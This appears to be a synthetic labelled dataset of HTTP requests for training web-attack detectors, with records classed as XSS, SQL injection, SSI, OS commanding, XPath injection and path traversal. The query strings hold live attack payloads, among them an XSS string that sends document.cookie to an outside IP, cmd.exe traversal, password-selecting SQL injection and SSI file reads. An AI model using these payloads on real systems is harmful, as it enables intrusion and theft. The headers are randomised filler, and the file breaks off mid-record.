Accept-Language: twa-h9dsmsax;q=0.7, wAnnDz-hi;q=0.5, elqcis-eeirn;q=0.2
Cache-Control: sa=tsiat
Client-ip: 179.242.140.245
Cookie: wroecnttst=hhautoexectkakltelnetnE;0sy3ea4jtvo=096;1Lkrtmne=cwqu+
Cookie2: $Version="74"
Date: Wed, 04 Oct 06 14:57:18 CET
ETag: W/"XVnSSkhMGncEq258"
Expect: Ise1ssl
From: 5ygo@eiccrasaq.org
If-Modified-Since: Mon, 27 Dec 04 07:48:06 CET
If-Unmodified-Since: Sun, 19 Aug 07 05:16:47 GMT
If-Match: *
If-None-Match: *
If-Range: "Mcqfsa_N5qS3LRQEldt"
Max-Forwards: 88
MIME-Version: 4.2
Pragma: nritL=a0u
Proxy-Authorization: Digest nonce
Authorization: NTLM dTR1T3RUZWJpb2FwNG9xeHRzNWhlNmxybnNOYjZoNG9zc3V0ZW5zaTJpZU10Y2d0
Range: 94941-674,-88804,1546-98301
Referer: /oh7lea/ttlfm/iRentTN/samiroo.jpeg
TE: deflate;q=0.3
Trailer: User-Agent
User-Agent: ev2e0e6ad (iEhvF3C1o; pbZxYX)
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 625x983
Via: 0.6 209.184.122.136:44654, FTP/9.5 www.nwomeWer.jpg, deh/2.2 www.ttsxys.shtml
Transfer-Encoding: compress
Upgrade: itor/5.7, 4up4ta/3.2
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 876584717
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36328
Start - Id: 48188
class: XSS
PUT /CgCbodyr9mEreplace/snnesocericE/E0Dincludegf/eH8@x2Bh.5U-GEvQ87sb/nD06Ow/uQ_t8lpe8-I3d.D.js? HTTP/1.1
Content-Length: 75
Content-Language: njsbStd
Content-Encoding: identity
Content-Location: /ognrbnd/actvr/d8t8ritN/sormmb/lafeo.nsf
Content-MD5: c21lbWV5Y2w4cWx5NnR3RA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Dec 06 13:20:21 CET
Last-Modified: Sun, 19 Nov 06 24:42:52 GMT
Host: www.litLue.uk:67365
Connection: oschcnJ8
Accept: text/html;q=0.9, application/postscript;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: compress, identity
Accept-Language: qycFapS-a, yn9E-yrpt
Cache-Control: no-store
Client-ip: 116.127.131.89
Cookie: u0tikmi=t9to9be;e6aNzsaymiav=lGH;ilieostadteeu=98422;Nw4styordwn=904413;tr=b.mtY@Ts1KBP;ixerilyse=79eeOe5h2tcy 
Cookie2: $Version="60"
Date: Mon, 22 Dec 08 24:52:48 GMT
ETag: W/"fHpeY1yAnsnzfzE3rW"
Expect: alo9v=ts9oerrr;si8nlg=taofacfO
From: hgaalsS@erkrnd3ae1.it
If-Modified-Since: Fri, 03 Feb 06 05:29:48 CET
If-Unmodified-Since: Tue, 20 Jan 09 17:01:09 GMT
If-Match: *
If-None-Match: "0AUvDd@AUh6F29Qkm"
If-Range: Sat, 10 Jul 04 09:42:18 GMT
Max-Forwards: 00
MIME-Version: 3.5
Pragma: e='rq9eft'
Proxy-Authorization: NTLM ZTlzaXNlaXhJaDBlQnZhbGVobXBlbHJkZnJwVXR0dDhobmFkeWFpbHRpZA==
Authorization: NTLM Y2FlNWF0cDJodGlvcjB3bW9pOW1zbGlBU2s4dGF0OGhvZWFydw==
Range: 4-7,-93,820296-262758
Referer: http://oee8.st/ehStwc/qlctnw/genre/adgg.mdb
TE: chunked;q=0.4
Trailer: Range
User-Agent: <form+name=eu2    ><select+name=aif>http://www.O9st.com/99/?</select ></form  >
UA-CPU: Sparc
UA-Disp: 6418,097,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 615x877
Via: 5.4 www.eysN.js, FTP/2.2 37.54.197.137, FTP/1.9 www.scdoc9js.htm:3
Transfer-Encoding: identity
Upgrade: srri/9.4, f3wl9/8.3, Feenos/9.2
Warning: 505 20.155.179.30 "pllnsh" "Sat, 12 Dec 09 10:14:04 GMT"
X-Forwarded-For: 168.34.69.100
X-Serial-Number: 1417997489185610927
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hlntg4thuiqfRib=16&2iTnwr9lshe=76669&@.h-0-@=iSTCdBSzcr4&42zautoexec=radaSn

End - Id: 48188
Start - Id: 47214
class: XSS
GET /8d/5aull/htpassJd/ct/tJaoSpBEXrPrDpDY5YpN/eoco/0ZosNZO_ytY2ENwouml7/cBBmU8n/e7aqttoep.asmx?rgoa=%3Cdiv++++style+%3D+++%22+++++width%3A++expression%28%5Bwindow.open%28%27http%3A%2F%2F15.15.113.106%2Forme.msf%27%2Bdocument.cookie%29%3B%5D%29%3B+++++%22+++%3E HTTP/1.1
Host: 166.29.99.51
Connection: atmusoSG
Accept: */*
Accept-Charset: iso-10646-ucs-2, windows-1257;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 220.86.207.11
Cookie: ZLgtelnet_=594649;era=fNd-X;uoes8his0ui4a=ecolaHmU;UJVB6GXL= aeahv
Cookie2: $Version="87"
Date: Sat, 28 Aug 04 07:43:58 CET
ETag: "sffq97EglwyE3Ups"
Expect: dtpt0epr
From: sHag@lasiBra.be
If-Modified-Since: Fri, 14 Oct 05 21:14:44 CET
If-Unmodified-Since: Wed, 07 Jun 06 02:12:35 CET
If-Match: "tRlkqTuA.5ZfWZfFKs"
If-None-Match: *
If-Range: Fri, 09 Feb 07 19:02:57 GMT
Max-Forwards: 27
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Digest uri=/dtiqe/ostoiddu/8YT9nSuz/4tmx.dll
Range: 4321-2
Referer: http://ltS7mck.uk/iigin/neTlnf.mpg
TE: gzip;q=0.7
Trailer: Range
User-Agent: hmu_zLcZp http://www.rhsEneo.fr
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 286x017
Via: 2.4 www.iteobo.png, Aqni/3.3 23.89.217.51, eautm/5.4 www.kaEt.tiff
Transfer-Encoding: compress
Upgrade: sdloi/4.2, a9og/5.3, Who9/3.5
Warning: 326 133.104.64.243 "thlBedsxran6eholh" 
X-Forwarded-For: 255.235.206.195
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47214
Start - Id: 43814
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 2.125.204.223
Connection: fe79e
Accept: image/*, video/*;q=0.8, video/*;q=0.7
Accept-Charset: koi8-r;q=0.1, iso-2022-jp
Accept-Encoding: *
Accept-Language: t5rp-n5;q=0.2, gkvSnmnL-f;q=0.7, ctC-tbt;q=0.5, nznb7h-wnS;q=0.1
Cache-Control: max-age=3313
Client-ip: 117.85.13.55
Cookie: eleneHassefFeb=c<rEesn<hsevLinI ;0h4eshlea=t4uuex;srsh0bkvml=igramochahnecho
Cookie2: $Version="522"
Date: Sat, 12 Feb 05 08:52:25 CET
ETag: W/"ZWarviPtT3Lux5IR2"
Expect: 100-continue
From: uZkpt@nesht4Iih.ch
If-Modified-Since: Mon, 04 Jan 10 02:16:34 CET
If-Unmodified-Since: Sun, 19 Nov 06 05:12:38 CET
If-Match: *
If-None-Match: "Gf6zU9KGTXQAQUrNBVJ"
If-Range: "334P3qq-3npHYIgugx6p"
Max-Forwards: 8
MIME-Version: 0.3
Pragma: adets='coCaujeo'
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: Basic cHBzb0U6bHloZQ==
Range: 7246-,-7950
Referer: /le9pi/rAlm/lcfnievc/rtagse/ingoeBr.pl
TE: deflate;q=0.8
Trailer: Accept-Charset
User-Agent: 2gPqFW0b http://www.slrtt.st
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 057x9927
Via: 0.7 www.itme.htm
Transfer-Encoding: otoh7
Upgrade: ren9do/0.2, 2ieds/4.2, a63ht/7.8, ezecpO/2.9
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43814
Start - Id: 48598
class: XPathInjection
PUT /urz4uWn/an/eall9tt.r/9Tl7bimostxrpede60i9/lftpS7bx9xSY5e/vi7i65-h/ehrfatnRlS/owsiL.aspx? HTTP/1.1
Content-Length: 347
Content-Language: dw1,n
Content-Encoding: compress
Content-Location: /xbRctstm/tdrn5/Tnrate.htm
Content-MD5: aGV1aWllcnJmaHJoc2J5eQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Sep 05 07:38:42 CET
Last-Modified: Mon, 12 Jun 06 17:44:59 GMT
Host: 30.150.38.201
Connection: close
Accept: image/png;q=0.5, video/mpeg;q=0.5
Accept-Charset: *
Accept-Encoding: gzip, gzip
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 58.151.109.14
Cookie: stp=ediioso?gktinput;rteg2i=eressij
Cookie2: $Version="357"
Date: Fri, 02 Mar 07 09:33:33 UTC
ETag: "24798vzil9D39PB9"
Expect: 100-continue
From: LhY2ychA@lseaat.st
If-Modified-Since: Mon, 20 Jun 05 14:16:38 CET
If-Unmodified-Since: Wed, 18 Jun 08 09:43:40 GMT
If-Match: *
If-None-Match: *
If-Range: "eK7x7COBp1sq9sCZ"
Max-Forwards: 8
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bWFlaW9vdWJyb2ZsSXRzWXVtVGJ2ZVhzeXB0dWlpc29zVXlCbGNhbnJtc2dsd3JB
Authorization: Basic bGUxdDpudXpTZnE=
Range: 39-76,5-4266
Referer: /mndoha/aaqtture/eeraom/acocfjj/fafhnm.php4
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: Mozilla/6.6 (Machintosh; U; PPC Mac OS X 5.9; r8-er; rv:4.2.3) Gecko/79972147
UA-CPU: PowerPC
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 853x5228
Via: 7.5 www.rQnn.tiff, artjhe/1.2 www.hbAwet.gif, FTP/0.8 220.203.239.194
Transfer-Encoding: identity
Upgrade: iroi/0.7, Osior/8.4, 9Ceim/4.8
Warning: 711 www.2azi1lut.css "nhuTpph3osOgtutn" "Sun, 02 Nov 08 07:06:07 CET"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 4557952
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

c7s4jdmemtt3rir=9TFqkCP&saSe=+6aadmini%2BwgetevalacceptIet%2Feq&yyNdrTewmeengd=aeS5+yFe%27nr%5Ca&htiAlr=4+++++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++979%3D&pF%uUquniongyG8GQ=nyBah9&t3a2uq=1Gn&tde=yudniwpeercIaii

End - Id: 48598
Start - Id: 39607
class: SSI
GET /d4/wayd76MEFQYckx/aideVye7isthcpSatst/Ennoe/Tuipal3Mri/gocrtasoiW.html?eglE3s2=%3C%21--++++%23include+++++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++++--%3E HTTP/1.1
Host: www.o7ynw.st
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: shift_jis, windows-1253;q=0.4
Accept-Encoding: compress;q=0.0, identity
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 44.48.32.90
Cookie: 4ogEtTrTocei=eJbB
Cookie2: $Version="219"
Date: Thu, 24 Jul 08 23:54:02 GMT
ETag: W/"5DYXg9DnNO7-9g7IHY"
Expect: nuEdWa
From: ts3vhh@kqzfn.com
If-Modified-Since: Mon, 19 Jul 04 07:04:33 GMT
If-Unmodified-Since: Fri, 18 May 07 20:11:32 UTC
If-Match: *
If-None-Match: "MTBU40FJNmp.BInK"
If-Range: Tue, 23 Jun 09 03:03:17 CET
Max-Forwards: 369
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM aWlzaW5oY3M1cnFuY3ZVbWE0T3R0aWU2b2p0OXRpcmU5aTh3bGFiaWFoZWk=
Range: 973-,-4,32221-
Referer: /yrfynets/otaau/ans8/smodati/haEbya2.tar
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.3 (compatible; Konqueror/4.8; Linux i586; Refva; iS4ml7hcqe; escsh)
UA-CPU: PowerPC
UA-Disp: 7073,179,8
UA-OS: Win9x
UA-Pixels: 1841x260
Via: 0.4 33.41.211.45, 1.0 www.tlheea.shtml
Transfer-Encoding: lpeitb
Upgrade: blrDl/9.7, eie/1.2, i9hq4/7.4
Warning: 438 147.77.52.61 "asjnh0na0txeitfAswd" "Wed, 19 Nov 08 03:37:46 CET"
X-Forwarded-For: 216.187.237.43
X-Serial-Number: 224017819
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39607
Start - Id: 44312
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 205.20.197.130
Connection: close
Accept: text/*;q=0.5, application/*
Accept-Charset: *;q=0.3
Accept-Encoding: identity, identity;q=0.0, deflate;q=0.4, gzip
Accept-Language: *;q=0.3
Cache-Control: min-fresh=4
Client-ip: 18.62.79.179
Cookie: 4o@scripthtpassgt=mtmewl%rsdocumentd;nbUn=aestbd)vnodeti~o;htqaieieVhdbaaN=+e;es=S6Leh2Sairsaanddndh;lbgftr=hxOee;iib=~otsy 
Cookie2: $Version="30"
Date: Tue, 02 Feb 10 06:27:29 CET
ETag: "8n0SdKaafzTrTySu-@"
Expect: 100-continue
From: T8dcgstj@o3Utp.fr
If-Modified-Since: Sun, 17 Jun 07 17:22:25 GMT
If-Unmodified-Since: Fri, 04 Aug 06 21:38:44 CET
If-Match: "CCiEzafJ6.IYM8u"
If-None-Match: "lwb5.bJassLthE5BqRF"
If-Range: *
Max-Forwards: 752
MIME-Version: 0.6
Pragma: ny6oslot=ht
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: Basic ZXI4YWY6ZUVubm44
Range: -2
Referer: http://hnGcfts.org/oenos/lr7ce/cs5EOp.php
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: 8gsv/7.1
UA-CPU: MIPS
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 5984x276
Via: FTP/7.2 74.126.183.152, 1.0 www.rlsed9ar.css, 7.1 www.5E3at.js:35
Transfer-Encoding: gzip
Upgrade: ott9i/7.1, tei/4.6
Warning: 284 www.natmB.jpeg:92644 "Hmt9" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44312
Start - Id: 42044
class: SqlInjection
GET /ap7LSI/l1D/bmheysiafEr/ynthtAatnnlevdnee/kaouGdiitnecvbD6ere/4z7_GEm/ej1-s.pEb/kwatrPFkDU0aMdaz7OA5/dlpDfcgG@/t4_gu29Z7_b_V-/eNI@xNQ684Y9Xef.swf?elho=aoTea4e&s3ney=4351&RbahrexocReAo=e4oslevuer8&teoroscan=Tnhe&teniaEse=%27%3B++++begin++declare+++%40ret+varchar%288000%29+++++set+++%40ret%3D%27%3A%27++select+%40ret%3D%40ret%2B%27++++%27%2B8htsra%2B%27%2F%27%2Bpassword+++++from+ebseh+where++++uei%3E%40ret+++++select+%40ret+++as+++++ret++++into+foo++++end--&lssE=3itv8ii9&telnet1Okl=9%40l1G&TeigsfdtL=ztLnswm0r7Sntgurne HTTP/1.1
Host: 14.187.64.44
Connection: close
Accept: text/xml
Accept-Charset: iso-8859-9, x-mac-cyrillic;q=0.8, windows-1250;q=0.5
Accept-Encoding: gzip;q=0.0, deflate;q=0.2
Accept-Language: ug05o-5k5orif;q=0.1, ennc-Edn;q=0.7, daaera-r;q=0.1, rl0at-tniashai;q=0.3
Cache-Control: no-transform
Client-ip: 238.155.89.77
Cookie: cmdKIhomethdhjyeQ=5Ln
Cookie2: $Version="2"
Date: Tue, 09 Aug 05 23:54:44 UTC
ETag: W/"uOk-Ks6myYKrSBH2D"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Sat, 26 Jan 08 19:05:35 UTC
If-Unmodified-Since: Wed, 26 Apr 06 22:35:29 UTC
If-Match: "3BXxFiC8FP_@k2Gn"
If-None-Match: *
If-Range: "GTjGF-FEDM86fcSk73vM"
Max-Forwards: 2791
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: 5heq iYitkt=3sapN
Authorization: NTLM dW9lNm90aGFheHNpdG9hYXd3ZXRFbm9mdDVpdXVkeWllYWVkbXg0aHpoQWw=
Range: -7
Referer: /7esh.tar
TE: deflate;q=0.5
Trailer: Accept
User-Agent: Mozilla/5.1 (Machintosh; U; Mac OS X 7.7; uT-fm; rv:8.6.8) Gecko/18574739
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 422x9399
Via: 8.0 www.ipeLehc.htm, 0.7 25.139.239.228, FTP/5.2 www.o7Iroc.tiff
Transfer-Encoding: 9sidq; v4oyRNt=rnxsdz1s
Upgrade: hUrier/3.1, imsa/1.4, hntw/4.9
Warning: 769 10.15.201.53 "Godo5tfeue" "Sat, 19 Aug 06 13:20:24 UTC"
X-Forwarded-For: 183.45.204.126
X-Serial-Number: 78968713276550254
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42044
Start - Id: 45603
class: PathTransversal
GET /sheg/h1TsOpiSI/5tcya/no_y17.g/cWEKYKL5pwcUaZZ.vRIG/tbz-lZkz3TMFhL/s7on52F5wOvl3e9e/azX7.WH1.msf?esHioeokscl6zt=R&Ynboner=4&ap35=%5CWINDOWS%5Csystem.ini&alia=t0loectenveEa4&dwrShetEHtehh=ua&merEgCutfAd=10813&rtehpOtsmai9e=aZ3&JTacliAaea=126708&a7sWt0tira=div%26rs&geeMtr=%3Ci%3Ah&Onti=tTet&oa=dincludep&ircce4eeBcode3=1923&UPsXOTXyP=lOBbBzPW7UO HTTP/1.0
Host: www.anwnXk9.fr
Connection: isy6ar
Accept: text/*, video/*;q=0.2, audio/x-wav;q=0.7
Accept-Charset: utf-7;q=0.1, utf-8
Accept-Encoding: deflate, gzip, compress;q=0.4, identity
Accept-Language: aire-ad1ctpol
Cache-Control: only-if-cached
Client-ip: 145.209.224.15
Cookie: qUPA4F4var9HvJ=acs2awherehg9n1t;rwedc5f=38;opwae=Utahoeta  6z;2Tt6tedmtsmaa=137
Cookie2: $Version="74"
Date: Sat, 04 Jun 05 24:03:10 GMT
ETag: "1uZHYBpjmXTTQQw"
Expect: esyo=tri8;dewo=I4XpUye
From: f4re3ea2@HiNl.uk
If-Modified-Since: Sun, 22 Jan 06 07:30:39 GMT
If-Unmodified-Since: Sat, 10 Mar 07 14:04:41 CET
If-Match: *
If-None-Match: "tIp05M.7R5.ZKjsc8_"
If-Range: Thu, 11 Sep 08 01:32:14 CET
Max-Forwards: 7
MIME-Version: 6.5
Pragma: 5pestsa=li
Proxy-Authorization: ench vu6n=5eeTe
Authorization: NTLM ZG5mQmVwaGFqdHN3M2g3d1JwdGQzMGkzaG1FSWNubU5vdWlzZXRpY2VhdHVz
Range: 942-,71595-5
Referer: /uz3i/sEohen0/aSa3tou/iuay/neTna.nsf
TE: deflate;q=0.5,trailers,chunked
Trailer: Accept
User-Agent: yhoi3h/7.7
UA-CPU: 68000
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 413x730
Via: 0.4 70.216.45.243
Transfer-Encoding: deflate
Upgrade: lsf/8.1, rxeP4b/0.5, dc3n5/4.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 228.147.206.124
X-Serial-Number: 749320741
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45603
Start - Id: 46516
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.1
Host: www.8Entjf.st:80
Connection: close
Accept: video/quicktime;q=0.6, audio/x-wav;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.0
Cache-Control: snqten6=t
Client-ip: 217.88.94.178
Cookie: rtn9wiyuark=ehl~?weweallaeallalk&L;b;roOr=gimcnzso3rax;a1tc=nf9-Jt.e3Iy;N6xNeursEr=aVueu;hge9issNrn=inhe9ocrg
Cookie2: $Version="1"
Date: Tue, 09 Jun 09 11:07:53 UTC
ETag: W/"Yx8VYHTjqtrVEnP"
Expect: 8enk=l68tr
From: csa3iee@teat.com
If-Modified-Since: Sun, 13 Nov 05 12:15:35 GMT
If-Unmodified-Since: Fri, 29 Feb 08 01:32:03 CET
If-Match: "G424.dHEwIlHZPqB@"
If-None-Match: "pxj_m.gXQ6E2vKg"
If-Range: Wed, 16 Jul 08 23:46:15 UTC
Max-Forwards: 7600
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: NTLM d29nc2tzd2ZJbnlsZGNmY2l1dHQ3Z3FzYWdvNG9tZXNmb3RzVG5sdHpxN3Nlcg==
Range: -97604
Referer: /tas8e/r1srM8a/0lJrw/nsaorae.sh
TE: chunked;q=0.5,gzip
Trailer: Pragma
User-Agent: Mozilla/9.4 (compatible; Konqueror/8.2; Win98; lsss0; p1sqirE; ttsa)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: HTTP/5.6 186.35.189.146, 4eg3/3.9 77.123.53.205:9864
Transfer-Encoding: deflate
Upgrade: 2Vhc/2.5, eea/9.3, c5t5/9.4
Warning: 496 54.104.249.69 "iplf" "Fri, 06 May 05 07:10:25 GMT"
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46516
Start - Id: 40690
class: SSI
GET /qTmfwiwXDSvQeSqi/2LfDuD/iImhevsnsseen/wx6PlbEa5/zo/Ko/dBierd7emxtrxhdrooi/itZJA-4bcgy5E3AI9-/svgpbgsoundsUzX1O3/kdKkNl.RSNvDcZ/Tmn/drvninTatSOorus.tiff?lbkiframecpasswd=eb&Mc5=eh%3Bnprocessing-instructionunionerditedhr8m&hpaii06li9linm=645&9tySeELra=38068313&h3=%7Eu5niaSm&tfp=%7Et&nnoc=EeasgtaAn&rrRu=uswd&nigadiR=h9FVlL7hZv8&Syrwue7tkt=8ex&hrt5=%3C%21--++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&hWrliac6on=uueLnu&pkOP2ZnanErxt=Ecwuphpohnsystem HTTP/1.0
Host: 233.93.189.85
Connection: elpoay
Accept: */*;q=0.6
Accept-Charset: iso-2022-kr;q=0.8, x-mac-icelandic;q=0.8
Accept-Encoding: 
Accept-Language: odoajo57-noNrdo3;q=0.1, ae7-njrDplV3;q=0.4, dC6tonas-ucte, otphdo7-sLe;q=0.5
Cache-Control: no-store
Client-ip: 194.79.71.60
Date: Sun, 11 Jan 04 11:54:38 UTC
Expect: 100-continue
If-Modified-Since: Mon, 19 Apr 04 20:51:18 UTC
If-Match: *
Authorization: Digest cnonce="DwaHa9"
Referer: /elH3e/iofo4t/i5er/4clE.cfm
TE: deflate;q=0.2
User-Agent: gmeOeisle8dZ9eoeo
UA-OS: WinNT
Transfer-Encoding: gzip

null

End - Id: 40690
Start - Id: 39409
class: SSI
GET /KVmIWlsUCI5/riSq-l10/re/aUL2pfFQNQ7i/67RoZpMDc/Ss6/eaXbLjQv.js?snsoUnhndj4enom=h%27o&zfdttc=396&Oqmj2LiSt=0&eueTuhrlntn=meeseasipUedseOdlh&nsMAI9aoahk=rsboot.iniuk&ayrbQvusrTY=7273493&Yof2_0aLslog=7usluSoreenvbscript%3Fareplaceiooa&Ddueabc3la8tefl=%3C%21--%23email+fromhost%3D%22www.stmsw2.com%22+tohost%3D%22mailbox.mepa.com%22+message%3D%22eAyn+estemes+ErizPnrc+tddeqf%22+fromaddress%3D%22tefimi.com%22+toaddress%3D%22wrne.hmindt.com%22+subject%3D%22Yc%22+sender%3D%22pape.com%22+replyto%3D%22jfgir.com%22+cc%3D%22ross%22+inreplyto%3D%22hatov+yrr+h%22+id%3D%22dliakmail%22+--%3E&zor988reNjatnto=dm80kT2UX&9ccrt=0&ssedwp=%2BR0&GcyMynsgsf5Yh=i&heroe=lr28&f6oe6=aue%3Fle%3De+%26uri%3Aeos HTTP/1.1
Host: 31.170.248.188
Connection: close
Accept: image/gif, image/jpeg
Accept-Charset: windows-1254, iso-8859-2;q=0.4, iso-8859-7;q=0.2, iso-8859-5;q=0.3, iso-2022-kr
Accept-Encoding: compress;q=0.8, gzip, gzip
Accept-Language: 5r7US-dusVoo97, iXwyst-a;q=0.5, hrH-ai;q=0.5, csa2Spda-ufs6ea;q=0.0
Cache-Control: no-transform
Client-ip: 53.251.40.228
Cookie: imLYte=384201;accepta0Jn0O8qlink=029109
Cookie2: $Version="22"
Date: Sat, 21 Nov 09 08:33:42 CET
ETag: "IbnKc4-D37dlywxLI"
Expect: 100-continue
If-Modified-Since: Mon, 03 May 04 20:04:20 GMT
If-Unmodified-Since: Wed, 22 Feb 06 23:18:52 UTC
If-Match: *
If-None-Match: *
If-Range: "v2BpL8MSi3_K6VKCS"
Max-Forwards: 77
MIME-Version: 6.3
Pragma: ihcj=tCeaeit
Proxy-Authorization: NTLM cmVIZXluZm5vaXJ0ZWVtcDFoMXdudjJpbHd5Ym1pdHQ=
Authorization: Basic c2kyQjpnb3Zp
Range: 747370-38132,5734-
Referer: http://ahao.ch/5tsnvae/slrnm4/yayunitt.zip
TE: trailers,trailers,chunked;q=0.6
Trailer: Via
User-Agent: kbtoa (tEdGimtS)
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-Color: color8
Via: HTTP/3.6 38.246.159.59, 9.2 222.166.155.221, HTTP/2.2 112.146.200.24
Transfer-Encoding: gzip
X-Serial-Number: 3653526354532
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39409
Start - Id: 42471
class: SqlInjection
GET /59nTN_K7o.uVE7hT/ac7YmYMgNN2tB870z5s2.htm?9eegIstryeSp=oUCQ_H0I&alo7=9cTM75wIoK&o7suwatihy0ttd1=iacts0My&Tt=sMDEHQVta6LR&6l2LKAoz=%27+%29++++UNION+++ALL+++SELECT+285++++FROM++++lcthe6niao+WHERE+++%28++++%27%27+%3D+%27&oa=eebnh&ga-DwS7hY7=fooqSrri&qefe=frombrec%2B+tnutmpRsneti%3A&5t=eJo&OTanzpfdkFtr=c-+&csSgt02SAon=+8n&a7lhoe=9934&m4mdfnn=IAe HTTP/1.0
Host: www.tanumyoh55.fr
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: nhl1-psrTeao;q=0.0, udae-hdfd4xr;q=0.3, ettsB-tO59ev;q=0.0, o-R2r, er-Ris;q=0.3
Cache-Control: max-age=561
Client-ip: 137.106.140.246
Cookie: ehcfue=csrn
Cookie2: $Version="582"
Date: Fri, 13 May 05 15:03:52 GMT
ETag: W/"O31nD@J3Iu0A1HEKQNyE"
Expect: ot5a
From: eabBn@aahunaiie.fr
If-Modified-Since: Thu, 19 Feb 09 15:16:13 GMT
If-Unmodified-Since: Sun, 13 Mar 05 03:49:30 CET
If-Match: "3jZ1Ow8wUTNQRCQS2l2"
If-None-Match: *
If-Range: Sun, 13 Sep 09 17:59:33 CET
Max-Forwards: 88
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM ZXR0dGlub0RpZjRlZTZvZTdkc2FubjZhOXRhc28ybmlhbm1vcmRueGls
Authorization: eptd iSea=snwne
Range: 909400-,77915-,-01017
Referer: /nsua/Tr5l/eG4ss.nsf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: ebDvlce
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: HTTP/1.2 64.160.114.64, 4.9 www.bzwpSBd.jpg, 3.2 www.zSsrwCp.htm
Transfer-Encoding: gzip
Upgrade: mc9c/0.1, Rek40w/1.3, rcow/4.1
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42471
Start - Id: 42385
class: SqlInjection
